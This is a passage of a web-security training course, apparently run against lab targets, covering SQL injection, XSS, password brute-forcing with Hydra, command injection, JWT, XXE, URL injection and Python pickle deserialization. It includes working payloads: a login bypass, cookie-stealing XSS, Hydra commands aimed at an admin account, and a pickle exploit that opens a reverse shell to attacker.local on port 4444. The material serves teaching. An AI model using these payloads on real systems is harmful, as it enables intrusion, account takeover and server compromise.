does not properly validate or sanitize user input and uses it in some form.
Access control
Vulnerabilities related to access control always refer to broken access control. In
essence, if a user is able to access functions or see information that they should not be
able to see, it is a case of inadequate access control or a vulnerability in access control.
Concrete vulnerabilities related to access control include, among others, IDOR
vulnerabilities (Insecure Direct Object Reference), where user-controlled identifiers are
used directly in handling a resource. It is an IDOR vulnerability if a user is able to
manipulate this identifier to directly access a resource that they are not supposed to
access. Access control also often refers to horizontal and vertical restrictions, where
horizontal refers to a restriction that prevents access to another user's information
within the same category, and vertical refers to restrictions between regular and higher
authority (Regular user vs. Administrator).
Authentication
Vulnerabilities related to authentication are emphasized in deficiencies in the login
process. Does the login take place in the browser using JavaScript or securely verify
the validity of usernames on the application side? Can an attacker perform automated
login attempts and thus programmatically guess thousands of passwords? Bypassing
two-factor authentication would also be a vulnerability in this category.
Session management
Session management deficiencies or vulnerabilities can include, for example, the
predictability of the identifier used for maintaining the session. If the identifiers used
after login are guessable, it is possible for an attacker to hijack the session. A good
example is the "Break into a website" task used in this course, where the session
cookie is not secure but easily guessable.
Misunderstanding of protocols
Protocol misunderstanding refers to a situation where developers exploit technologies
without understanding the underlying functionality. A good example of this is XXE
vulnerabilities, where hidden functions in XML can be used by attackers to execute
various attacks. Another example is the use of different PDF generators, which can
sometimes execute HTML or JavaScript code from the server side, thereby stealing
files from the server or conducting other attacks.
What is SQL?
SQL (Structured Query Language) is a general query language used by applications to
communicate with their databases. Applications use databases to store and retrieve
data.
Let's go through a few basics. Below is a carefully selected list of things that hackers
specifically need for SQL injection attacks.
Simple example
Here is a query that retrieves (SELECT) the name and email (name, email) columns
from the user table (FROM users).
SQL Playground
SELECT name, email FROM users
Execute query
All columns
If you want to restore all columns, write an asterisk (*) in the column selector.
SQL Playground
SELECT * FROM users
Execute query
Execute query
Sorting of Results
If you want to organize the results based on the user's name, you can do so with the
ORDER BY clause.
SQL Playground
SELECT * FROM users ORDER BY name
Execute query
ORDER BY clause can be followed by an order: from first to last (ASC, default) or from
last to first (DESC).
SQL Playground
SELECT * FROM users ORDER BY name DESC
Execute query
ORDER BY can also take a number, such as 1, which would mean "order by the first
column" (which happens to be id in the query).
SQL Playground
SELECT id, name FROM users ORDER BY 1
Execute query
Merging Surveys
If you want to perform two queries, for example "name of all users" and "name of all
animals", and return the combined results of both queries, you can use the UNION
SELECT statement.
SQL Playground
SELECT name FROM users UNION SELECT name FROM animals
Execute query
Comments
In an SQL query, a comment can be added with the -- characters, which interrupts the
query and the rest of the "query" is interpreted as a note, not as SQL. It's important to
note that after the -- comment, there should always be a space, otherwise the SQL is in
the wrong format and the query will not go through (it may go through in this simulated
SQL environment, but in a real database it will usually not go through).
SQL Playground
SELECT * FROM users -- Tämä kysely hakee kaikki käyttäjät
Execute query
Comments can be made sometimes, depending on the database solution, also with a
hashtag (#).
It is possible to open and close a comment during a survey using the format /*
comment */.
SQL Playground
SELECT * FROM /* Tämä kommentti on vähän hassussa paikassa mu
Execute query
When the user tries to log in with the address john.doe@example.com and the correct
password (s3cr3t), the database returns one row and the application logs the user in
with the corresponding username contained in that row. Everything works correctly at
this stage.
SQL Playground
SELECT id FROM users WHERE email='john.doe@example.com' AND p
Execute query
When the user tries to login with the wrong password, the database does not return
any rows, and the user is given an error message stating that the login failed.
Everything continues to work as it should.
SQL Playground
SELECT id FROM users WHERE email='john.doe@example.com' AND p
Execute query
But what happens if the user enters a password with a tick ('')? The query will no longer
pass through, and the application crashes uncontrollably because suddenly SQL is no
longer in the correct format and the database query fails. There is one tick too many.
The database server was expecting a matching opposite for the new tick as well. If you
send a tick (or quotation marks) to the application and receive an error message back,
always suspect SQL injection vulnerability.
SQL Playground
SELECT id FROM users WHERE email='john.doe@example.com' AND p
Execute query
What if the attacker modifies the SQL to the format they want and manages to make it
work again? What if the user entered the password kissa' OR 1=1--?
SQL Playground
SELECT id FROM users WHERE email='john.doe@example.com' AND p
Execute query
The survey suddenly returns all users from the database, and the application
incorrectly logs in the user as the first user that happened to return from the database,
even if the password was not correct. 1=1 is always true, so every row was returned,
and the quotation mark added by the application was removed by commenting it out to
prevent it from breaking the query structure.
This was a simple, and one could say, a very classic example of an SQL injection
vulnerability. We will go through numerous techniques in the course to find and exploit
this vulnerability.
How to protect against vulnerability?
The best way is to not build SQL manually at all and let a modern programming library
(ORM / Object Relational Mapper) handle the low-level communication with the
database. Another option is to use a library (prepared statements) that allows safely
parameterizing SQL queries, so that the library handles the processing of dangerous
characters (such as in this case, it was possible for quotes to "escape" from the string
and interfere with the structure of the query).
3 - XSS (Cross-Site Scripting)
Cross-Site Scripting (XSS) is a vulnerability that allows malicious JavaScript code to be
injected into trusted websites. This enables the execution of malicious code in the
browsers of users who use the site.
XSS vulnerabilities occur when untrusted input is not properly handled and is returned
to the browser as is. As a result, the browser interprets the input as code on the client
side. Such input can be, for example, an open comment on a discussion forum.
The image below is an example of what a successful XSS attack could look like. The
attacker discovers an XSS vulnerability on the website, saves malicious JavaScript
code on the site, and when the user(s) visit the infected site, the code is executed,
allowing the attacker to steal the desired information.
Example of a vulnerable solution
Here is a PHP script that is vulnerable to XSS attacks.
echo "<p>Hakutulokset haulle: " . $_GET('haku') . "</p>"
It is vulnerable because it creates HTML code unsafely. The URL parameter search is
not properly encoded. An attacker can create a link like the following, which executes
the attacker's JavaScript code on the website when the target opens it:
https://www.example.com/?haku=<script>alert('XSS')</script>
Opening the link will cause the following HTML to be executed in the user's browser:
<p>
Hakutulokset haulle:
<script>
alert('XSS')
</script>
</p>
XSS Vulnerability Categories
XSS vulnerabilities are often classified into categories based on:
Can vulnerability be exploited in such a way that malicious JavaScript code injected
by an attacker "stays" on the page, for example in a message on a discussion forum?
This would be persistent, stored or persistent XSS.
Does harmful code only reflect once when the target of the attack opens a
maliciously formatted link? This is referred to as "reflected" XSS.
Or regardless of these two, if the vulnerability exists solely in JavaScript code that,
for example, dangerously handles browser URL anchors. These are usually referred to
as DOM-based XSS vulnerabilities.
Various situations when XSS vulnerabilities occur
The vulnerability typically arises for one of the following reasons:
Inadequate encoding: The application constructs HTML unsafely
(parameterization without proper encoding).
WYSIWYG editors: The application allows users to directly edit the website's
HTML code (for example, WYSIWYG editors).
File uploads: The application allows users to send HTML/SVG files and serves them
back unsafely.
Vulnerable components:The application uses outdated and vulnerable JavaScript
libraries.
eval() and its partners: The application uses JavaScript insecurely by inputting
untrusted data into functions that execute code directly from a string (such as eval).
Links:
XSS vulnerabilities can be found practically anywhere, where it is possible for the
application user to input something into the application, which the application returns
back to the browser at some point. The first step in finding such vulnerability is to send
input to the application and search for a place in the HTML code where the input is
reflected.
Start by sending a message to the chat and finding it in the HTML response.
You can, for example, use the search field provided by Burp Suite to find your message
from the HTML code.
Next, HTML input is sent to the application. If the application is not vulnerable, it
converts HTML characters like < and > to a safe form < and >, but if the
application is vulnerable, characters will remain as is in the HTML response, allowing
you to add arbitrary modifications to the application's HTML code.
In the image below, we enter <b>hello</b> and find that the application is vulnerable.
Note that the input is URL-encoded.
This allows us to confirm that this website is vulnerable. Next, we will attempt to exploit
this vulnerability and steal the session cookies of the admin user.
Adding JavaScript code to the page
First, let's make sure that we can input JavaScript code into the page using the
traditional <script> element. For example, in security audits, a common Proof of
Concept (PoC) is to display a JavaScript alert like this:
<script>alert(1)</script>
When you get the alert box visible on the page, you have verified the vulnerability as
well as the ability to use JavaScript code in the attack. Next, let's see how the
vulnerability could be exploited.
Reading Session Token
If the application uses cookies for session management and has not protected the
cookie with the HttpOnly directive (which prevents JavaScript code from accessing
the cookie), the session identifier can be read through the document.cookie property
as follows:
<script>alert(document.cookie)</script>
POST / HTTP/1.1
Host: www-yv2kdqpzkf.ha-target.com
...
message=moi
VASTAUS
HTTP/1.1 200 OK
...
We expect the administrator to visit the page again. At which point the administrator
should send their own session ID with a message.
Note that you also send your own session ID every time you reload the page, as you
are exposed to an attack in the same way as the administrator.
Step 4: Adding the stolen session token to your own browser
We open a new incognito window and add a system administrator cookie to the
browser. The simplest way to do this is to open the JavaScript console and define the
system administrator cookie as our own.
document.cookie = "SessionId=.eJ...";
Finally, we update the page and confirm that we are logged in as the system
administrator.
4 - Dictionary attacks against passwords
Dictionary attack is very simple. We take the username, a list of common or likely
passwords, and then attempt to log in with each password found in the list.
Exercise
There are several ways to perform this type of attack. In this exercise, we will use a
password list found at the path /usr/share/wordlists/common-passwords.txt on the
practice machine and a command-line tool called THC Hydra to automate the guessing
process.
Preparation
Let's find out what kind of HTTP request is sent for a login attempt and how to
distinguish a successful or failed login from the HTTP response.
Start by logging into the application and then find the login request from Burp's HTTP
history:
Send the request with the correct password first and examine the HTTP response. It
can be concluded that the correct response is, for example:
Returns HTTP status code 302
Body contains the text "Redirecting..."
It is about 200 characters long.
HTTP-PYYNTÖ
email=student%40ha-target.com&password=student
VASTAUS
Send the same request with the wrong password. It can be concluded that the
incorrect response, for example:
Returns HTTP status code 200
Body contains "Invalid username or password"
It is about 5000 characters long.
HTTP-PYYNTÖ
email=student%40ha-target.com&password=EiOikeaSalasana
VASTAUS
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 4933
Location: http://www-0xrue3l19e.ha-target.com/
Set-Cookie: session=.eJw...; HttpOnly; Path=/
...
...
<strong class="font-bold">Oops!</strong>
<span class="block sm:inline pr-5">Invalid username or passw
...
Finally, examine the HTTP request itself. It is a POST request to the path /login, with a
content type of application/x-www-form-urlencoded and two parameters in the
body: email (user's email address) and password (user's password).
With this information, we can move forward!
Hydra configuration
The syntax of Hydra in this case is as follows:
hydra -t <power (threads)> -l <username> -p <password> <domain> <module>"
<path>:<body>:F=<text that signifies failed login>".
-l can be replaced with a capital L -L, which means instead of a username, a file with
multiple usernames. -p can also be replaced with a capital P -P, which similarly means
a password list. However, let's first try with just one username and password,
specifically yours, to ensure that Hydra works correctly.
-t 4 is an appropriate power level to prevent the lab from crashing. The default value is
16, which can be heavy for the application.
In the body, the areas where username and password are inputted are marked with the
texts <USER> and <PASS>.
Username: student@ha-target.com
Password: student
Domain: Your lab's domain, e.g. www-0xrue3l19e.ha-target.com
Module: https-post-form (Hydra module that handles urlencoded HTTPS POST
forms)
Path: /login
body: email=^USER^&password=^PASS^
Failed Login: Invalid (HTTP response indicating a failed login attempt, contains the
text "Invalid")
You could thus try hydra approximately in this way:
hydra -t 4 -l "student@ha-target.com" -p student www-0xrue3l
If the experiment feels successful, try the wrong password next. This time Hydra
should not succeed.
hydra -t 4 -l "student@ha-target.com" -p EiOikeaSalasana www
Initiating an Attack
In order to initiate the actual attack, we make two changes to the "hydra command".
We change the username to the email address of the target of the attack, which in
this case is jessica.blanchard@ha-target.com (in your lab, the admin's email address
can be found on the lab homepage).
Instead of using a password (-p), we use a password list (-P) that is located in the
path /usr/share/wordlists/common-passwords.txt
hydra -t 4 -l "jessica.blanchard@ha-target.com" -P /usr/share
Then you just wait for a moment, while Hydra goes through the password list, and if
you're lucky, you'll get the admin user's password!
5 - Command Injections
Operating System Commands
In practice, almost all operating systems have some kind of command prompt or text-
based user interface. In Windows, it is called the command prompt (cmd.exe) or
powershell, in Linux and Mac it is bash, sh, zsh, etc. And these command prompts can
be used to launch text-based programs and commands. For example, we can ping
Google:
$ ping google.com
PING google.com (209.85.233.101) 56(84) bytes of data.
64 bytes from lr-in-f101.1e100.net (209.85.233.101): icmp_seq
Operating System Commands in Programming
Sometimes applications use console tools in the background. We could have, for
example, a web application built with Python that aims to ping a certain IP address and
display the result of the ping on the website. The example code might look like this:
def do_GET(request):
ip = request.get_parameter("ip")
result = os.popen(f"ping -c1 {ip}").read()
return {"result": result}
Injection
The problem here is that adding user input to an operating system command is
terrifyingly dangerous. By adding certain special characters to the "IP address," an
attacker can trick the application into running completely different operating system
commands than just ping.
Command substitution
Let's take command substitution, which can be used to include the output of another
command as part of a command. Substitution can be done using the syntax
$(command) or `command`.
$ pwd
/tmp
$ echo "pwd on: $(pwd)"
pwd on: /tmp
$ echo "pwd on: `pwd`"
pwd on: /tmp
Thought Exercise
Labrassa is a web diagnostics tool that checks if a website is up. Behind the scenes,
the tool uses the curl command. You can see from the top of the page what commands
are executed on the server. How would you start an attack?
6 - JWT 'None' Algorithm Attack
What on earth is JWT?
JWT is an abbreviation for JSON Web Token, which refers to a very common way of
transmitting small amounts of data between a browser and a server, or between
information systems, in digitally signed format.
JWT tokens usually look like this:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZS
If you look closely, you will notice that the token has three parts separated by periods.
First part: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
Second part:
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5M
Third part: SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
All parts of the token are base64-encoded. Base64 is a widely used method to
transform any type of data into a format consisting of 64 different characters, and
back.
Part 1: JOSE-Header
The first part of the token is JOSE (Javascript Object Signing and Encryption) header,
which contains information such as the encryption algorithm or signature algorithm of
the token.
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 is decoded as (base64):
{"alg":"HS256","typ":"JWT"}
alg: Encryption/Signing algorithm. HS256 refers to the algorithm "HMAC with SHA-
256", which is a symmetric signing algorithm, meaning that the digital signature is
generated and verified using the same encryption key.
Type: Not used for much, value is usually JWT.
2. Part: Data
The second part contains the token's information (also referred to as the token's data
or payload).
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5M
is base64 decoded:
{"sub":"1234567890","name":"John Doe","iat":1516239022}
The data section information is also referred to as "claims". Typically, the token
contains some sort of user identifier, possibly a list of user rights, and usually also
includes information about when the token was created and when it expires.
The following claims are included in the example token:
subject: The subject, in this case the user's identifier.
Name: User name
Issued at (iat): "Issued at" is the epoch timestamp that indicates when the token
was issued.
Often you also see the following claims:
iss: "Issuer", who has issued the token.
aud: "Audience", who the token is intended for processing.
exp: "Expiration time", an epoch timestamp indicating when the token expires.
nbf: "Not before", when the token becomes valid.
jti: "JWT ID" - Unique identifier for this token. Can be used, for example, to prevent
the same token from being used again or to revoke (disable) the issued token.
Part 3: Signature
The third part of a JWT token is a digital signature.
SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c when base64-decoded:
I�J�IHNJ(]�O���lj~ �:N�%_�u ,×. So it's gibberish.
As the algorithm is HS256, which is HMAC + SHA256, the digital signature is formed as
follows, simplistically:
A: Take Part 1, or the JOSE Header, and base64 encode it.
B: Take the 2nd part, which is the token information, and base64 encode it.
C: Connect point A and B. The result, which is the message to be signed, looks like
this:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZS
Take the encryption key K and combine it with the message to be signed C.
Process a combination (K + C) of a hash algorithm (in this case SHA256) and obtain
a final digital signature.
Signature verification
When implementing JWT, it must:
Know the algorithm used to sign the token.
Uses an algorithm and calculates the signature from the JWT.
Compare the calculated signature with the signature included with the token and
verify that they match.
Check if the token has expired or if it is possibly still valid.
etc.
JWT Vulnerabilities
JWT is a versatile protocol, and it has historically been misunderstood both in
implementations (such as JWT software libraries used by applications) and in their
usage (applications where a JWT handler is not securely defined).
From where should the JWT verification, for example, determine what algorithm is used
if the developer has not explicitly stated it in the application code? A perfectly
reasonable and natural answer is "from the JOSE header". That is why it is written
there. But what if the attacker alters the token information to their liking (e.g., "userId":
"admin") and then sets the algorithm of the token to "none", meaning no signature is
required? If the application accepts such a token, the consequences are catastrophic.
What if the JWT has been signed with a weak secret and an attacker manages to
guess it, and then creates their own tokens?
Let's now familiarize ourselves with one possible vulnerability, namely the support of
the "None" algorithm.
"None" Algorithm
One of the "signature algorithms" of JWT is "None", meaning no signature at all. If an
application accepts such tokens, even if the developer has not thought about it, the
consequences are catastrophic. A JWT token whose signature algorithm is "None"
looks like this:
The second option is to use Burp Suite's "JSON Web Tokens" extension:
Step 4 - Victory
After assembling a new JWT, replace the originally present token in the HTTP request
and resend the request.
7 - XXE (XML External Entity) Attacks
Unexpected features
There are heaps of vulnerabilities with different names, but usually they can be
categorized into a considerably smaller amount of basic concepts. One of these
concepts is "unexpected features", which refers to a vulnerability that arises because
the developer uses a software component, tool, protocol, etc. whose functionality is not
fully understood.
One excellent example of this is the €20,000 bug bounty that GitLab paid out on the
Hackerone platform for a remote code execution vulnerability discovered in their
markdown editor. The vulnerability was found in their markdown processor
(KramDown), which they were not aware of, and it allowed for malicious activities by
inputting a specific format of markdown into the application.
https://hackerone.com/reports/1125425
However, much more common vulnerability in this category is XML External Entity
(XXE), which we learned about in this course. XXE is short for XML External Entity,
meaning an external entity of the XML protocol. So it is a part of the XML protocol that
developers often are not aware of.
What is XML?
XML (Extensible Markup Language) is a text-based protocol used for representing
structured data. If you have seen HTML code, you are likely already familiar with XML
structure. HTML is, in fact, an XML-based language.
XML primarily consists of tags and attributes. Tags look like this <TAG START>TAG
CONTENT</TAG END>. So for example, a car with the brand "Lada" and the year
"1955" could be represented in XML as a car tag, within which there is a brand tag with
the value "Lada" and a year tag with the value "1955".
<auto>
<merkki>Lada</merkki>
<vuosimalli>1955</vuosimalli>
</auto>
Typically XML has both mixed together. So the structure is: tags, text or tags inside the
tags, and all tags can have attributes.
DTD
DTD is an abbreviation for Document Type Definition and it can be used to specify the
structure of an XML document. The specification is done with the DOCTYPE tag as
follows.
<!DOCTYPE juurielementti [
elementit ja entiteetit
]>
For this reason, certain characters are represented as entities in XML syntax if you do
not want the characters to become part of the XML structure. For example, the <
character can be expressed as the entity < and the > character as the entity >.
<auto>
<merkki>Volvo<XC60></merkki>
<vuosimalli>2013</vuosimalli>
</auto>
DTD Entities
Entities can also be defined by yourself. For example, you can define that while the
> entity means the > character, the entity &lempimerkki; means the value Volvo.
This can be done in the DTD specification as follows:
<!DOCTYPE auto
[
<!ENTITY lempimerkki "Volvo">
]>
<auto>
<merkki>&lempimerkki;</merkki>
<vuosimalli>1955</vuosimalli>
</auto>
External Entities
XML also supports the use of external entities to assemble XML documents from
multiple different parts. An external entity is defined with the keyword SYSTEM or
PUBLIC after the entity name. Think of a book, for example, with three different
chapters. The book could be composed of XML documents book.xml, chapter1.xml,
chapter2.xml, and chapter3.xml.
The contents of the paragraphs could be:
<kappale>
Oli synkkä ja myrskyinen yö...
</kappale>
This is how an XML handler would output something like this, and the structure of the
book and paragraphs remain nicely separate in their own files.
<kirja>
<kappale>
Oli synkkä ja myrskyinen yö...
</kappale>
<kappale>
Sankarimme perille saavuttuaan...
</kappale>
<kappale>
Täysin odottamatta...
</kappale>
</kirja>
Vulnerability
If you have followed along so far, then understanding XXE vulnerability is relatively
simple. The vulnerability is about:
The application contains code that handles XML.
The application's XML handler has not been configured to prevent the use of
external entities.
The attacker is able to input XML to be processed by the application.
An attacker can reference files on the server's disk using external entities.
The attacker is able to read the processed XML which contains the content of the
file desired by the attacker.
The attacker is thus able to read files from the server's disk in such cases.
Good to know at this stage
There are many variations in XXE vulnerabilities and ways to exploit them. Depending
on the programming language, XML processor, and platform on which the application
is running, XXE can be used to do different things. It is also not necessary to directly
view the XML response, as there are techniques to leak information over the network.
8 - Access control vulnerabilities
Tricky problem
Often there is a simple solution to avoid vulnerabilities. SQL injections can be avoided
by using a secure library for making SQL queries. XXE can be avoided by securely
initializing the XML handler. And numerous other examples.
But access control is not included in this group. Application access control is usually
not especially difficult, but it is terribly easy to make one critical mistake with it, and the
security of the entire application is at risk. Problems related to access control are also
easy for an attacker to find and exploit.
What is access control?
Identification means that the user is asked for some form of identification information,
such as a username and password, which can be used to verify that the user is who
they claim to be.
Session management refers to the process in which, once the user has been identified,
the user's identity is securely transmitted between the browser and the server. This
allows the user to not have to re-enter their username and password every time they
click something on the page.
Access control, or authorization, refers to the application making a decision on whether
a specific user is allowed to do or see something or not.
The following examples are access control decisions:
Can user X see user X's information?
Can user X delete user Y's data?
Can user X use function Y?
Appearance can be deceiving
It is important to remember that the user of the application is not limited to the
application's user interface. The user of the application is limited to the HTTP interface
provided by the application, for which a user interface has been created to facilitate its
use.
This means that it is extremely important for the application to take care of access
control on the server side, not just on the browser side. It doesn't matter for access
control purposes what menus the application visually has available. The only thing that
matters is what the code on the server side does with the HTTP request that comes
from the user.
9 - URL Injections
Common Injections
Injection is a vulnerability where an attempt is made to parameterize a protocol, but the
data intended as a parameter manages to break out of its place and becomes part of
the protocol structure.
URL Injection
URL injection is a simple example of this. When an application builds URL addresses,
for example, to make a call to another (internal) background system, and adds a path or
parameter from user input to the built URL address, there is a risk of URL injection if the
input is not properly encoded.
Example
The next image represents a situation where URL injections can occur.
In the above picture, the webpage performs an HTTP request to a background service
using the user-provided username as part of the URL path.
url = "/varattu/" + kayttajan_antama_syote
This seems completely safe and innocent, but what happens if the user provides a
value instead of a username that redefines the final location of the query made by the
website? If the website does not build URL addresses securely, this can enable, for
example, the use of the ../ string in the input, which can sometimes allow traveling
backwards in the URL path.
In the above query, the user entered ../users as input, which modified the final location
of the query made by the website, causing the application to make an internal HTTP
request to a different path than intended by the developer.
Example
We start by performing the registration in the application. We check the HTTP request
caused by the Burp Suite program.
We notice that registration causes an HTTP request to the interface /verify. Let's verify
the operation of the interface from the source code.
@app.route("/varmista", methods=['POST'])
def varmista():
sposti = request.form.get("sposti")
responssi = requests.get("http://127.0.0.1:5000/api/user/"+
return jsonify(responssi.json())
The code used by the interface shows that the application receives a given email
address and executes a new query to the interface /api/user/ + email. From the source
code, we also see that the application does not perform any kind of formatting on the
given email address, which means that the application is vulnerable to URL injection
attacks.
If we examine the code of the interface in question, we notice that it is not possible to
execute queries on the interface itself, as the interface checks that the queries are
coming from the address 127.0.0.1.
@app.route("/api/user/<user_mail>")
def user_api(user_mail):
ip_address = flask.request.remote_addr
if ip_address not in ('127.0.0.1', '::1', 'localhost'):
...
By examining the source code further, we can observe that the application also has
another internal interface where IP address verification is performed.
@app.route("/api/users", methods=['GET'])
def users_api():
ip_address = flask.request.remote_addr
if ip_address not in ('127.0.0.1', '::1', 'localhost'):
abort(404)
users = database.get_users()
return jsonify({ 'Users': users })
The interface in question simply returns all application users from the database. The
discovered URL injection vulnerability is used to redirect the query made by the
interface to the above /api/users interface.
Voilá! - We succeeded in making an HTTP request where we redirected the server's
HTTP request to another API, and this returned the "Flag" to us.
10 - Deserialization vulnerabilities
What is serialization?
Serializing (serialization) is used in programming to transform objects into a format in
which they can, for example, be saved to a disk or transferred over a network.
Here is an example (serialisoi.py) that uses the Python pickle library to serialize a car.
import pickle
from base64 import b64encode, b64decode
class Auto(object):
def __init__(self, merkki: str, vuosimalli: int):
self.merkki = merkki
self.vuosimalli = vuosimalli
def __str__(self):
return f"{self.merkki} VM {self.vuosimalli}"
auto = Auto(merkki='Volvo', vuosimalli=1975)
print(auto)
print(b64encode(pickle.dumps(auto)).decode('utf-8'))
When the script is executed, it will output the car in serial (base64-encoded) format.
python3 ./serialisoi.py
Volvo VM 1975
gASVPgAAAAAAAACMCF9fbWFpbl9flIwEQXV0b5STlCmBlH2UKIwGbWVya2tpl
class Auto(object):
def __init__(self, merkki: str, vuosimalli: int):
self.merkki = merkki
self.vuosimalli = vuosimalli
def __str__(self):
return f"{self.merkki} VM {self.vuosimalli}"
serialisoitu = sys.argv[1]
auto = pickle.loads(b64decode(serialisoitu))
print(auto)
The original purpose of the function is to help parse the object correctly. But the
purpose we are interested in is executing arbitrary code on the server when the
application takes the "car" apart!
Car bomb
Let's make a third script, hax.py, which builds an object for us that has the __reduce__
function defined. The return value of the function is a tuple, where the first element is a
function and the second element is another tuple that contains the parameters.
In the example below, __reduce__ in the code returns a tuple ("print", ("PUM!",)),
which means that the call to the print function with the parameter "PUM!".
import pickle
from base64 import b64encode, b64decode
import os
class Auto(object):
def __init__(self, merkki: str, vuosimalli: int):
self.merkki = merkki
self.vuosimalli = vuosimalli
def __reduce__(self):
return (print, ("PUM!",))
print(b64encode(pickle.dumps(auto)).decode('utf-8'))
As a result, the application cannot decompose the car (its value becomes None), but
the application executes the attacker's code, i.e. print("PUM!").
python3 hax.py
gASVIwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAhlY2hvIFBVTZSFlFKUL
python3 deserialisoi.py gASVIwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtl
PUM!
None
os.system
The os.system() function can be used to conveniently execute operating system
commands.
import pickle
from base64 import b64encode, b64decode
import os
class Auto(object):
def __init__(self, merkki: str, vuosimalli: int):
self.merkki = merkki
self.vuosimalli = vuosimalli
def __reduce__(self):
return (os.system, ("echo PUM",))
python3 hax.py
gASVIwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAhlY2hvIFBVTZSFlFKUL
python3 deserialize.py "gASVIwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtl
PUM
0
Summary
When an application tries to deserialize a serialized object that an attacker has been
able to modify, the attacker may be able to execute arbitrary code on the server. In the
case of Python's pickle, the easiest way to perform the attack is to serialize an object
that has been defined with the __reduce__ function, because the deserialization
process of pickle calls this function. Such functions that can execute code during
deserialization are commonly referred to as "gadgets".
Example
Take an application that has a language selection.
Suspicious cookie
When the language of the application is changed, the application always sets a new
cookie "userPrefs", which contains something clearly base64-encoded. We take the
value of the cookie, decode it, and save it to the file "userprefs.data".
echo 'gANjX19tYWluX18KVXNlclByZWZlcmVuY2VzCnEAKYFxAX1xAlgEAAA
Investigating a file. Python has a built-in module for examining pickle files. So we can
try to see if the file has been serialized with pickle like this:
python3 -m pickletools userprefs.data
0: \x80 PROTO 3
2: c GLOBAL '__main__ UserPreferences'
28: q BINPUT 0
30: ) EMPTY_TUPLE
31: \x81 NEWOBJ
32: q BINPUT 1
34: } EMPTY_DICT
35: q BINPUT 2
37: X BINUNICODE 'lang'
46: q BINPUT 3
48: X BINUNICODE 'en'
55: q BINPUT 4
57: s SETITEM
58: b BUILD
59: . STOP
highest protocol among opcodes = 2
command = '''
echo PUM
'''
class Exploit(object):
def __reduce__(self):
return (os.system, (command,))
e = Exploit()
print(b64encode(pickle.dumps(e)).decode('utf-8'))
Then you just execute the code and send the output to the application as a cookie.
python3 exploit.py
gASVKAAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwMcHJpbnQoJ1BVTScpl
HTTP-PYYNTÖ
GET / HTTP/1.1
Host: www-c0cpuypk1b.ha-target.com
Cookie: session=.eJw...; UserPrefs=gASVKAAAAAAAAACMCGJ1aWx0aW5
Connection: close
VASTAUS
The application crashes as expected because the UserPreferences object was not, of
course, parsed from the cookie. However, if we were to look at the application log, we
would notice that it says "PUM".
Reverse Shell
It's time to take control of the server.
Start a netcat listener on port 4444. Next, run Python code on the target server that
connects to the port and gives control of the server to you.
nc -lvnp 4444
listening on [any] 4444 ...
nc = netcat
-l = listen
-v = verbose (tell when the connection is being established)
-n = avoid unnecessary DNS queries
-p = port
And what about that Python code? Handy script snippets for these situations can be
found, for example, in the PayloadAllTheThings repository. Here is the Python code
that you can use in an attack. The code works as follows:
Open a connection to the address attacker.local (your attacker machine) on TCP
port 4444.
Open a shell (/bin/sh) and connect the shell's stdin, stdout, and stderr to a socket.
import socket,os,pty;s=socket.socket();s.connect(("attacker.l
You can run Python code snippets from the command line using "python -c <code>".
So your code will be:
import pickle
from base64 import b64encode
import os
command = '''
python -c 'import socket,os,pty;s=socket.socket();s.connect((
'''
class Exploit(object):
def __reduce__(self):
return (os.system, (command,))
e = Exploit()
print(b64encode(pickle.dumps(e)).decode('utf-8'))
Run the code and send the application the UserPrefs cookie with a serialized object as
the value, which when executed triggers a remote connection (reverse shell) to your
listener. If everything goes well, you will get a shell in your listener that allows you to
read the flag.
root@whlhxbyzok-student:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.0.1.108] from (UNKNOWN) [10.0.1.68] 55534
cat /flag.txt
eyJhbG...